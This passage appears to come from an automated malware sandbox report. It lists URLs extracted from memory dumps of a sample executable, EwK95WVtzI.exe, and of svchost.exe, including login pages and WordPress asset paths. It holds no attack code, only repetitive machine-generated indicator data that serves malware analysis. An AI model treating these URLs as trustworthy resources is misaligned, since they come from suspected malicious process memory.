00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1568005697.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549009595.0000000003650000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://johnmorello.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1388843234.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                Source: svchost.exe, 00000008.00000002.2788073238.0000000007012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://keio-web.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023659658.0000000008480000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mobilnic.net/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/register/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pcgrate.com/
                Source: svchost.exe, 00000008.00000002.2788073238.0000000007012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pellys.co.uk/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/dynamic-visibility-for-elementor//assets/css/dynamic-visibili
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.16.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.16.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.16.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.16.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.min.js?
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.16
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/css/modules/lazyload/frontend.min.css?ver=3.
